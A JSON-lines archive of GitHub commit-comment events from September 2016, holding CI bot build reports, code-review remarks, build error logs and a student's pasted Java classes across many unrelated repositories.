{"id":"4547192259","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18979617,"position":null,"line":null,"path":null,"commit_id":"faef9446a121b579893b70e162b131a03b401048","created_at":"2016-09-12T03:43:17Z","updated_at":"2016-09-12T03:43:17Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-faef9446a121b579893b70e162b131a03b401048-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-faef9446a121b579893b70e162b131a03b401048-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T03:43:17Z"}
{"id":"4547198078","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18979624,"position":null,"line":null,"path":null,"commit_id":"faef9446a121b579893b70e162b131a03b401048","created_at":"2016-09-12T03:45:52Z","updated_at":"2016-09-12T03:45:52Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-faef9446a121b579893b70e162b131a03b401048-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-faef9446a121b579893b70e162b131a03b401048-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T03:45:52Z"}
{"id":"4547198179","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18979625,"position":4,"line":99,"path":"components/patient-data/api/src/main/java/org/phenotips/data/PatientRepository.java","commit_id":"efc0631bb055b484c4992177f504039a8ba66dc1","created_at":"2016-09-12T03:45:55Z","updated_at":"2016-09-12T03:45:55Z","body":"Since this is a new method in this branch, it could just be removed."}},"created_at":"2016-09-12T03:45:55Z"}
{"id":"4547201921","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18979636,"position":null,"line":null,"path":null,"commit_id":"faef9446a121b579893b70e162b131a03b401048","created_at":"2016-09-12T03:47:36Z","updated_at":"2016-09-12T03:47:36Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-faef9446a121b579893b70e162b131a03b401048-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-faef9446a121b579893b70e162b131a03b401048-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T03:47:36Z"}
{"id":"4547203062","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18979641,"position":64,"line":58,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-12T03:48:07Z","updated_at":"2016-09-12T03:48:07Z","body":"If you don't surround the code in curly braces like `{ <code goes here> }`, then you will get an error or warning or something saying you are redefining a constant. The curly braces restrict the scope of `const` and `let` (but not `var` because `var` is not block-scoped). Restricting the scope that way is good because it means you can move the tests around and change things about it without affecting other tests. The way it is now, the variable `localeString` leaks between the two tests. Not a big deal, but I think it is a slight improvement to add the block scoping and declaring it with `const` in the two blocks.\r\n\r\n"}},"created_at":"2016-09-12T03:48:07Z"}
{"id":"4547205109","type":"CommitCommentEvent","actor":{"login":"HimbeersaftLP"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18979650,"position":33,"line":77,"path":"src/pocketmine/block/Anvil.php","commit_id":"8678d18013dcfec201477fcfaec707d2647b7a9c","created_at":"2016-09-12T03:49:05Z","updated_at":"2016-09-12T03:49:05Z","body":"I thought it's called Genischiss? :P"}},"created_at":"2016-09-12T03:49:05Z"}
{"id":"4547207597","type":"CommitCommentEvent","actor":{"login":"taimai0604"},"repo":{"name":"taimai0604/TaiMai1"},"payload":{"comment":{"id":18979656,"position":null,"line":null,"path":null,"commit_id":"b58390cf29e115594f6c7e91d47537ef67745560","created_at":"2016-09-12T03:50:19Z","updated_at":"2016-09-12T03:50:19Z","body":"asdsadasda"}},"created_at":"2016-09-12T03:50:19Z"}
{"id":"4547207996","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18979657,"position":64,"line":58,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-12T03:50:29Z","updated_at":"2016-09-12T03:50:29Z","body":"Also, for an example of this in the current code base, see https://github.com/nodejs/node/blob/83a354c33b29686ba6df9cd017ab6b4baaff4272/test/parallel/test-event-emitter-add-listeners.js. A constant named `ee` is declared in three different blocks in that file. (Each `ee` is a different instance because, again, block-scoping.)"}},"created_at":"2016-09-12T03:50:29Z"}
{"id":"4547214199","type":"CommitCommentEvent","actor":{"login":"sp2410"},"repo":{"name":"sp2410/Coding-Problems"},"payload":{"comment":{"id":18979671,"position":null,"line":null,"path":null,"commit_id":"e83d2fd385acf7d36397d5a44c67a65ea1bc6532","created_at":"2016-09-12T03:53:24Z","updated_at":"2016-09-12T03:53:24Z","body":"Reverse an Int"}},"created_at":"2016-09-12T03:53:24Z"}
{"id":"4547215748","type":"CommitCommentEvent","actor":{"login":"sp2410"},"repo":{"name":"sp2410/Coding-Problems"},"payload":{"comment":{"id":18979675,"position":null,"line":null,"path":null,"commit_id":"d26f628f831a33c73f1d7bdfac3b93faf0a724ce","created_at":"2016-09-12T03:54:07Z","updated_at":"2016-09-12T03:54:07Z","body":"Update given Excel Column number to Number"}},"created_at":"2016-09-12T03:54:07Z"}
{"id":"4547217522","type":"CommitCommentEvent","actor":{"login":"liubiantao"},"repo":{"name":"2remote/yaopai-mobile"},"payload":{"comment":{"id":18979676,"position":37,"line":33,"path":"app/components/WorkPage/PriceTag.js","commit_id":"c589624bb48ead90dddf23f92a3fdd09b0002365","created_at":"2016-09-12T03:54:57Z","updated_at":"2016-09-12T03:54:57Z","body":"@zaxlct 哦，原来是这个意思，我还以为你让我把什么 handleClick, {data} 之类的都省略掉呢，我以为什么又出啥黑科技了。\r\n\r\n不过刚看了一下规范，还是按规范来吧\r\nhttps://github.com/yuche/javascript#8.2\r\n> 8.2 如果一个函数适合用一行写出并且只有一个参数，那就把花括号、圆括号和 return 都省略掉。如果不是，那就不要省略。 "}},"created_at":"2016-09-12T03:54:57Z"}
{"id":"4547219718","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18979682,"position":null,"line":null,"path":null,"commit_id":"9a4060704c686318195c5d4ccdce2a022ef2c696","created_at":"2016-09-12T03:55:57Z","updated_at":"2016-09-12T03:55:57Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-12T03:55:57Z"}
{"id":"4547224492","type":"CommitCommentEvent","actor":{"login":"RegaliaEzz"},"repo":{"name":"RegaliaEzz/Hexa-N9208"},"payload":{"comment":{"id":18979694,"position":null,"line":null,"path":null,"commit_id":"e7bd1b09df702abf873b8bbd38757d33f07ca4ff","created_at":"2016-09-12T03:58:23Z","updated_at":"2016-09-12T03:58:23Z","body":"Credit to @mus1711 a.k.a extreme kernel"}},"created_at":"2016-09-12T03:58:23Z"}
{"id":"4547226826","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18979700,"position":null,"line":null,"path":null,"commit_id":"726451d829628f9d9208177b62bbca37073f1645","created_at":"2016-09-12T03:59:35Z","updated_at":"2016-09-12T03:59:35Z","body":"Tested with -nrgenall and identical results before and after.  Also checked v1.45 ECB vs 2.20 ECB.  Again, -nrgenall tested 100% the same.\r\n\r\nThe ```sub ecb_padding_none() ``` was not nearly as hard to write as I thought.   And it works like a champ, hiding the differences between the version's interfaces.  I am not happy that they kept the same name, and did not provide the original legacy interface.  It would have been TRIVIAL to do, by simply change the PADDING_NONE function to return 'none', and simply handle the 0 or 1 'constants'.  By not supporting legacy, it forces script writers to either force upgrades to v2.00 OR to write a function like mine, to support both interfaces.  Not good at all :-"}},"created_at":"2016-09-12T03:59:35Z"}
{"id":"4547234487","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"syzygy1/Stockfish"},"payload":{"comment":{"id":18979717,"position":null,"line":null,"path":null,"commit_id":"c95b70b855888b9fed745f5d3b657b0b2eb1426b","created_at":"2016-09-12T04:02:58Z","updated_at":"2016-09-12T04:02:58Z","body":"Bounds are set to [-1,3] instead of [-3,1]?"}},"created_at":"2016-09-12T04:02:58Z"}
{"id":"4547238098","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979720,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:04:41Z","updated_at":"2016-09-12T04:04:41Z","body":"import java.util.Scanner;\r\n\r\npublic class FaturaTeste{\r\n    public static void main(String args[]){\r\n        Scanner input = new Scanner(System.in);\r\n       \r\n        System.out.println(\"Digite a quantidade de produtos que você deseja colocar na fatura?\");\r\n        int numeroDeProdutos=input.nextInt();\r\n        Fatura produtos[] = new Fatura[numeroDeProdutos];\r\n        double total = 0;\r\n       \r\n        for(int i=0;i<produtos.length;i++){\r\n            produtos[i] = new Fatura();\r\n            produtos[i].setNumero(i+1);\r\n            System.out.println(\"Produto: \" + (i+1));\r\n            System.out.println(\"Digite uma descrição: \");\r\n            String descricao = input.next();\r\n            produtos[i].setDescricao(descricao);\r\n            System.out.println(\"Digite o valor do preço: \");\r\n            produtos[i].setPreco(input.nextDouble());\r\n            System.out.println(\"Digite a quantidade: \");\r\n            produtos[i].setQuantidade(input.nextInt());\r\n            total+=produtos[i].getFaturaAmount();\r\n        }\r\n       \r\n        for(Fatura element:produtos){\r\n            System.out.println(\"Produto de numero: \" + element.getNumero());\r\n            System.out.println(\"Descrição: \" + element.getDescricao());\r\n            System.out.println(\"Quantidade: \" + element.getQuantidade());\r\n            System.out.println(\"Preço: \" + element.getPreco() + \"\\n\");\r\n        }\r\n       \r\n        System.out.println(\"O total da fatura eh: \" + total);\r\n    }\r\n}"}},"created_at":"2016-09-12T04:04:41Z"}
{"id":"4547238229","type":"CommitCommentEvent","actor":{"login":"ChMaxou"},"repo":{"name":"krzyzanowskim/CryptoSwift"},"payload":{"comment":{"id":18979721,"position":null,"line":null,"path":null,"commit_id":"9d24227c379d655ffb1b9ff74d40760065272cba","created_at":"2016-09-12T04:04:46Z","updated_at":"2016-09-12T04:04:46Z","body":"Thanks for your patience, but I don't see this in my target's \"Build phases\", I only see it when I look into CryptoSwift.xcodeproj, is it where I'm supposed to do it? It seems odd."}},"created_at":"2016-09-12T04:04:46Z"}
{"id":"4547238258","type":"CommitCommentEvent","actor":{"login":"aloysiusbest"},"repo":{"name":"aloysiusbest/the-fox"},"payload":{"comment":{"id":18979722,"position":1,"line":1,"path":"the_fox","commit_id":"a8ab7ee940a8d22c0da46e6f84007b2edf56abb2","created_at":"2016-09-12T04:04:47Z","updated_at":"2016-09-12T04:04:47Z","body":"by Kenneth Patchen"}},"created_at":"2016-09-12T04:04:47Z"}
{"id":"4547240163","type":"CommitCommentEvent","actor":{"login":"aloysiusbest"},"repo":{"name":"aloysiusbest/the-fox"},"payload":{"comment":{"id":18979726,"position":3,"line":3,"path":"the_fox_2","commit_id":"a8ab7ee940a8d22c0da46e6f84007b2edf56abb2","created_at":"2016-09-12T04:05:43Z","updated_at":"2016-09-12T04:05:43Z","body":"Condensed each set of two lines into one for each thought"}},"created_at":"2016-09-12T04:05:43Z"}
{"id":"4547246029","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979738,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:08:43Z","updated_at":"2016-09-12T04:08:43Z","body":"public class ScudariaFerrari {\r\n String cor, modelo;\r\n int velocidadeAtual, velocidadeMaxima;\r\n\r\n public void ligar() {\r\n}\r\n\r\n public void acelerar(int velocidadeAtual, int velocidadeAcrescentada) {\r\n if (velocidadeAtual > velocidadeAcrescentada)\r\n System.out.println(\"A velocidade do carro foi execida!\");\r\n}\r\n\r\n public String getCor() {\r\n return cor;\r\n}\r\n\r\n public void setCor(String cor) {\r\n this.cor = cor;\r\n}\r\n\r\n public String getModelo() {\r\n return modelo;\r\n}\r\n\r\n public void setModelo(String modelo) {\r\n this.modelo = modelo;\r\n}\r\n\r\n public int getVelocidadeAtual() {\r\n return velocidadeAtual;\r\n}\r\n\r\n public void setVelocidadeAtual(int velocidadeAtual) {\r\n this.velocidadeAtual = velocidadeAtual;\r\n}\r\n\r\n public int getVelocidadeMaxima() {\r\n return velocidadeMaxima;\r\n}\r\n\r\n public void setVelocidadeMaxima(int velocidadeMaxima) {\r\n this.velocidadeMaxima = velocidadeMaxima;\r\n}\r\n\r\n}"}},"created_at":"2016-09-12T04:08:43Z"}
{"id":"4547249126","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979744,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:10:19Z","updated_at":"2016-09-12T04:10:19Z","body":"package unipe;\r\n\r\npublic class Fita {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t\r\n\tFitasInfantis\t   f = new  FitasInfantis();\r\n\tFitaLançamento\t   fl = new  FitaLançamento();\r\n\tSystem.out.println(\"PREÇO DA FITA INFANTIL É    \"+ f.setlocar(60));\r\n\tSystem.out.println(\"PREÇO DA FITA LANÇAMENTO FOI  \"+ fl.setlocar(60));\r\n\t\t\r\n\t}\r\n\r\n\t\r\n\tString titulo, genero, locação,categoria;\r\n\t public static double preço=80;\r\n\r\n}\r\n"}},"created_at":"2016-09-12T04:10:19Z"}
{"id":"4547249685","type":"CommitCommentEvent","actor":{"login":"Saify"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":18979745,"position":null,"line":null,"path":null,"commit_id":"6b36e266c6dc47ccb2746a649f9ac13123673d09","created_at":"2016-09-12T04:10:36Z","updated_at":"2016-09-12T04:10:36Z","body":"Hi,\n\nI have tried following two installations and installed WebObject543,\n\nWOInstaller.jar\nhttp://wocommunity.org/documents/tools/ <http://wocommunity.org/documents/tools/>\nWebObjects543.dmg\nsupport.apple.com/downloads/DL688/en_US/WebObjects543.dmg\n\nAnd recently I have tried latest Wonder frameworks https://github.com/wocommunity/wonder <https://github.com/wocommunity/wonder>\nbut still facing same error,\n\nCan you please share which version of WebObjects should I use with latest Wonder frameworks\n\nRegards,\nSaif.\n\n\n> On Sep 7, 2016, at 2:01 PM, Johann Werner <notifications@github.com> wrote:\n> \n> What versions of WO and Wonder do you use? Seems that you are not using a recent version.\n> \n> As you can see in the code above and in a current Wonder checkout as well _colCount is not package scoped but protected. In current Wonder 7 the WOTable component has been removed from ERExtensions but there is still the one in JavaWOExtensions which is used as base class for ERXTable.\n> \n> In Wonder 6 that former copy of WOTable is still there but marked as deprecated.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/wocommunity/wonder/commit/6b36e266c6dc47ccb2746a649f9ac13123673d09#commitcomment-18925122>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAikRe5p9e5SEHTTV01cThAtY1Zf7UTLks5qnn15gaJpZM4J2IdM>.\n> \n\n"}},"created_at":"2016-09-12T04:10:36Z"}
{"id":"4547250488","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979751,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:11:03Z","updated_at":"2016-09-12T04:11:03Z","body":"package unipe;\r\n\r\npublic class FitaLançamento extends Fita {\r\n\r\n\t\r\n\r\n\r\n\tpublic double setlocar(double preço){\r\n\t\tpreço =  ((preço*0.20)+ preço);\r\n\t\treturn  preço ;\r\n\t}\r\n}\r\n"}},"created_at":"2016-09-12T04:11:03Z"}
{"id":"4547251509","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979754,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:11:35Z","updated_at":"2016-09-12T04:11:35Z","body":"package unipe;\r\n\r\npublic class FitasInfantis extends Fita {\r\n\t\r\n\t\r\n\r\n\tpublic double setlocar(double preço){\r\n\t\tpreço =  (preço-(preço*0.40));\r\n\t\treturn  preço ;\r\n\t\t\r\n\t}\r\n\r\n}\r\n"}},"created_at":"2016-09-12T04:11:35Z"}
{"id":"4547253147","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979755,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:12:27Z","updated_at":"2016-09-12T04:12:27Z","body":"public class PrincipalVeiculo {\r\n\r\n\tprivate static VeiculoDeCarga veiculoC;\r\n\r\n\tpublic static void main(String[] args) {\r\nVeiculoPasseio  veiculoP = new VeiculoPasseio ();\r\nsetVeiculoC(new VeiculoDeCarga ());\r\nSystem.out.println(veiculoP.locacao(5,10,5 ));\r\n\t}\r\n\r\n\tpublic static VeiculoDeCarga getVeiculoC() {\r\n\t\treturn veiculoC;\r\n\t}\r\n\r\n\tpublic static void setVeiculoC(VeiculoDeCarga veiculoC) {\r\n\t\tPrincipalVeiculo.veiculoC = veiculoC;\r\n\t}\r\n\r\n}"}},"created_at":"2016-09-12T04:12:27Z"}
{"id":"4547256094","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979760,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:14:01Z","updated_at":"2016-09-12T04:14:01Z","body":"public class Veículo {\r\n\tprivate String placa;\r\n\tprivate String marca;\r\n\tprivate String modelo;\r\n\tprivate int ano;\r\n\tprivate double valorKmRodado;\r\n\tprivate\tdouble  kmInicial=0; ;\r\n\tprivate double  kmFinal;\r\n\tprivate double  valorLocaçăo;\r\n\tpublic double preco;\r\n\tprivate \tdouble  chassi;\r\n\tPessoa propietario;\r\n\t\t\r\n}\r\n"}},"created_at":"2016-09-12T04:14:01Z"}
{"id":"4547258217","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979761,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:15:00Z","updated_at":"2016-09-12T04:15:00Z","body":"public class VeiculoDeCarga extends Veículo {\r\n\r\n\tprivate double capacidadeDEcarga;\r\n\t\r\n\t\r\n\t\r\n\tpublic double locacaoCarga(double  kmInicial,double kmFinal, double valorKmRodado)\r\n\t{\r\n\t\tpreco= (kmInicial -kmFinal) * valorKmRodado;\r\n\t\r\n\r\n\treturn preco;\r\n\t}\r\n\r\n\r\n\r\n\tpublic double getCapacidadeDEcarga() {\r\n\t\treturn capacidadeDEcarga;\r\n\t}\r\n\r\n\r\n\r\n\tpublic void setCapacidadeDEcarga(double capacidadeDEcarga) {\r\n\t\tthis.capacidadeDEcarga = capacidadeDEcarga;\r\n\t}\r\n}"}},"created_at":"2016-09-12T04:15:00Z"}
{"id":"4547258582","type":"CommitCommentEvent","actor":{"login":"RobLoach"},"repo":{"name":"libretro/easyrpg-libretro"},"payload":{"comment":{"id":18979763,"position":null,"line":null,"path":null,"commit_id":"ed675ffa723a91ddaf115dae64bb07376d646b32","created_at":"2016-09-12T04:15:11Z","updated_at":"2016-09-12T04:15:11Z","body":"Running into zlib not found:\r\n\r\n```\r\ncc -std=gnu99 -D__LIBRETRO__ -fPIC -I../.. -I../../src -I../../lib -I../../lib/libpng -I../../lib/liblcf/src -I../../lib/pixman -I../../lib/liblcf/src/generated -I../../lib/libretro-common/include -I../../lib/libretro-common/include/compat -I../../lib/wildmidi/include -I../../lib/libsamplerate -DUSE_LIBRETRO -DHAVE_PTHREADS  -DHAVE_OGGVORBIS -DHAVE_TREMOR -DWANT_FASTWAV -DHAVE_WILDMIDI -DHAVE_LIBSAMPLERATE -DWANT_ZLIB   -c -o ../../lib/libz/gzclose.o ../../lib/libz/gzclose.c\r\nIn file included from ../../lib/libz/gzclose.c:6:0:\r\n../../lib/libz/gzguts.h:25:25: fatal error: compat/zlib.h: No such file or directory\r\n```"}},"created_at":"2016-09-12T04:15:11Z"}
{"id":"4547264296","type":"CommitCommentEvent","actor":{"login":"heroes7"},"repo":{"name":"haozheMa/PullAndDownDemo2"},"payload":{"comment":{"id":18979767,"position":null,"line":null,"path":null,"commit_id":"5fb1b3db8b786658b7d6b1a534d20e481784ea21","created_at":"2016-09-12T04:17:25Z","updated_at":"2016-09-12T04:17:25Z","body":"怎么预览，看效果？"}},"created_at":"2016-09-12T04:17:25Z"}
{"id":"4547269987","type":"CommitCommentEvent","actor":{"login":"paddyforan"},"repo":{"name":"impractical/tokens"},"payload":{"comment":{"id":18979773,"position":null,"line":null,"path":null,"commit_id":"62720612c211c9b29adf24d72f70054c1826d9e1","created_at":"2016-09-12T04:20:25Z","updated_at":"2016-09-12T04:20:25Z","body":"__apiary.manifest contains reference to non-existent file in repository.__ (Autogenerated message from apiary.io)\n+ apiary.apib"}},"created_at":"2016-09-12T04:20:25Z"}
{"id":"4547270226","type":"CommitCommentEvent","actor":{"login":"rivaldogomes"},"repo":{"name":"rivaldogomes/https-github.com-rivaldogomes--MLPIII_CC__2016_2_LISTA1"},"payload":{"comment":{"id":18979774,"position":null,"line":null,"path":null,"commit_id":"9557d387f8e1ba8ab745971ad57d8937d819799b","created_at":"2016-09-12T04:20:31Z","updated_at":"2016-09-12T04:20:31Z","body":"public class VeiculoPasseio extends Veículo {\r\n\r\n\tprivate boolean ar;\r\n\tprivate int qtdPortas;\r\n\tpublic double locacao(double  kmInicial,double kmFinal, double valorKmRodado)\r\n\t{\r\n\t\tpreco= (kmInicial -kmFinal) * valorKmRodado;\r\n\t\r\n\r\n\treturn preco;\r\n\t}\r\n\tpublic boolean isAr() {\r\n\t\treturn ar;\r\n\t}\r\n\tpublic void setAr(boolean ar) {\r\n\t\tthis.ar = ar;\r\n\t}\r\n\tpublic int getQtdPortas() {\r\n\t\treturn qtdPortas;\r\n\t}\r\n\tpublic void setQtdPortas(int qtdPortas) {\r\n\t\tthis.qtdPortas = qtdPortas;\r\n\t}\r\n}"}},"created_at":"2016-09-12T04:20:31Z"}
{"id":"4547280256","type":"CommitCommentEvent","actor":{"login":"paulirish"},"repo":{"name":"samccone/testing-h2-push"},"payload":{"comment":{"id":18979790,"position":11,"line":11,"path":"extract-push.js","commit_id":"d58bbd38a15b53255a4437bdec1f15a1d2abcc84","created_at":"2016-09-12T04:25:39Z","updated_at":"2016-09-12T04:25:39Z","body":"how about `window.document.head.querySelectorAll` ? Assuming other people copy this technique, would you want assets outside the head to get pushed?\r\n\r\nmaybe, but depends on how PRPL you do things, eh      "}},"created_at":"2016-09-12T04:25:39Z"}
{"id":"4547284749","type":"CommitCommentEvent","actor":{"login":"rapee"},"repo":{"name":"s-amon-s/delivery"},"payload":{"comment":{"id":18979793,"position":7,"line":7,"path":"application/models/delivery_schema.php","commit_id":"fa4cc389ec28fdaca37da509b8e9977ff6e6cecb","created_at":"2016-09-12T04:27:52Z","updated_at":"2016-09-12T04:27:52Z","body":"Be careful of white spaces. Choose either tabs or spaces and stick to it all the time.\r\n\r\nBetter to config your editor to automate this."}},"created_at":"2016-09-12T04:27:52Z"}
{"id":"4547285826","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18979795,"position":119,"line":119,"path":"components/family-studies/migrations/src/main/java/org/phenotips/studies/family/migrations/R71496PhenoTips2339DataMigration.java","commit_id":"0b266200f41b18f5a9162826dc01121f66b86d98","created_at":"2016-09-12T04:28:23Z","updated_at":"2016-09-12T04:28:23Z","body":"Wrong version here. I'm fixing it."}},"created_at":"2016-09-12T04:28:23Z"}
{"id":"4547287367","type":"CommitCommentEvent","actor":{"login":"rapee"},"repo":{"name":"s-amon-s/delivery"},"payload":{"comment":{"id":18979798,"position":15,"line":12,"path":"application/models/delivery_model.php","commit_id":"fa4cc389ec28fdaca37da509b8e9977ff6e6cecb","created_at":"2016-09-12T04:29:02Z","updated_at":"2016-09-12T04:29:02Z","body":"One space after \",\""}},"created_at":"2016-09-12T04:29:02Z"}
{"id":"4547289088","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18979799,"position":null,"line":null,"path":null,"commit_id":"8d85ce6ac988af8601bac8fe6a56fb75216f279c","created_at":"2016-09-12T04:29:44Z","updated_at":"2016-09-12T04:29:44Z","body":"@snicolet Just FYI\r\nIn the test-description you say: Less SEE in qsearch\r\nBut from that what I understand your modification affects only the ALL_EVASIONS phase (the unique phase to call score<Evasions>) which is never executed from qsearch. IMO this is only called in normal search when the moving side is in check."}},"created_at":"2016-09-12T04:29:44Z"}
{"id":"4547295567","type":"CommitCommentEvent","actor":{"login":"jayelm"},"repo":{"name":"jldbc/groupme-analytics"},"payload":{"comment":{"id":18979803,"position":97,"line":97,"path":"Groupme_Analytics.ipynb","commit_id":"e0770f2f4e42e87c16710db3c27c473003e79949","created_at":"2016-09-12T04:32:38Z","updated_at":"2016-09-12T04:32:38Z","body":"use\r\n\r\n```\r\nwhile messages.iolder():\r\n    pass\r\n```"}},"created_at":"2016-09-12T04:32:38Z"}
{"id":"4547297610","type":"CommitCommentEvent","actor":{"login":"kikolio"},"repo":{"name":"kmcabrera22/intro-workbook"},"payload":{"comment":{"id":18979806,"position":4,"line":6,"path":"11LessonEleven/in-class-project/index.html","commit_id":"2e8942bba6bfdde73f6b1a209d6a08e93766a99f","created_at":"2016-09-12T04:33:39Z","updated_at":"2016-09-12T04:33:39Z","body":"Check the `content` value. I think it's `device-width`"}},"created_at":"2016-09-12T04:33:39Z"}
{"id":"4547301043","type":"CommitCommentEvent","actor":{"login":"FacticiusVir"},"repo":{"name":"FacticiusVir/SharpVk"},"payload":{"comment":{"id":18979811,"position":null,"line":null,"path":null,"commit_id":"96255148469fa5b804d98951e53bac2129533598","created_at":"2016-09-12T04:35:20Z","updated_at":"2016-09-12T04:35:20Z","body":"#16 "}},"created_at":"2016-09-12T04:35:20Z"}
{"id":"4547312275","type":"CommitCommentEvent","actor":{"login":"ohga21"},"repo":{"name":"kitalab/CircularNotices"},"payload":{"comment":{"id":18979819,"position":17,"line":506,"path":"Model/CircularNoticeContent.php","commit_id":"b6985c79daccef090f2ab9b7af255a5bfe063260","created_at":"2016-09-12T04:40:47Z","updated_at":"2016-09-12T04:40:47Z","body":"関数名がチェックなのに配列の中身を書き換えるのは混乱のもと。\r\n__resetDeadlineIfNotSet\r\nみたいな方がわかりやすい。"}},"created_at":"2016-09-12T04:40:47Z"}
{"id":"4547316989","type":"CommitCommentEvent","actor":{"login":"Jonathan50"},"repo":{"name":"Jonathan50/do-it"},"payload":{"comment":{"id":18979821,"position":null,"line":null,"path":null,"commit_id":"d71e60ce11fa6c50cd38a9ade9f1a796e08738dd","created_at":"2016-09-12T04:43:02Z","updated_at":"2016-09-12T04:43:02Z","body":"I tried to compile a program before this and it didn't work. I thought it was because there were periods in the middle of labels so I did this (since I knew periods at the start of labels were ok) but actually the problem was I forgot to pass `-m32` to GCC"}},"created_at":"2016-09-12T04:43:02Z"}
